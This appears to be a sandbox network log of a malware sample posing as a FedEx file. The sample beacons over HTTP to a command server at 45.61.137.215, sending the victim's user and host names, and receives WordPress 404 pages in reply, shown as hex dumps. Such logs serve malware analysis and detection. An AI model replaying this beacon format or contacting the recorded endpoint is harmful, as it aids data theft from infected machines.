May 22, 2024 22:03:03.810564041 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 22, 2024 22:03:03.813761950 CEST	1236	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
May 22, 2024 22:03:03.813776970 CEST	1236	IN	Data Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
May 22, 2024 22:03:03.813786983 CEST	1236	IN	Data Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49737	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:03:03.962388992 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:03:04.055845022 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:03:07.225677967 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:03:04 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:03:07.227160931 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:03:07.228903055 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:03:07.228914022 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:03:07.233228922 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:03:07.233241081 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:03:07.237535954 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 22, 2024 22:03:07.237562895 CEST	1236	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 22, 2024 22:03:07.237572908 CEST	1236	IN	Data Raw: 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b Data Ascii: ar(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important
May 22, 2024 22:03:07.241863966 CEST	896	IN	Data Raw: 61 63 6b 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 Data Ascii: ack-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49738	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:03:07.384773970 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:03:07.435925007 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:03:11.166091919 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:03:07 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:03:11.167093039 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 22, 2024 22:03:11.171586037 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 22, 2024 22:03:11.171598911 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 22, 2024 22:03:11.173456907 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 22, 2024 22:03:11.175654888 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 22, 2024 22:03:11.175667048 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 22, 2024 22:03:11.175677061 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 22, 2024 22:03:11.180087090 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 22, 2024 22:03:11.180102110 CEST	224	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49739	45.61.137.215	80	6192	C:\Users\user\Desktop\FedEx_776282383902.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2024 22:03:11.339176893 CEST	244	OUT	POST /index.php/t?id=090 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A316C5D8 Content-Length: 165 Connection: close
May 22, 2024 22:03:11.398499966 CEST	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 31 00 38 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841618FRONTDESK-PC0FDD42EE188E931437F4FBE2C
May 22, 2024 22:03:15.108117104 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 22 May 2024 20:03:11 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 22, 2024 22:03:15.108824968 CEST	224	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
May 22, 2024 22:03:15.110435009 CEST	1236	IN	Data Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
May 22, 2024 22:03:15.112139940 CEST	1236	IN	Data Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
May 22, 2024 22:03:15.112154961 CEST	1236	IN	Data Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything\|\|(n.readyCallback(),(e=n.source\|\|{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
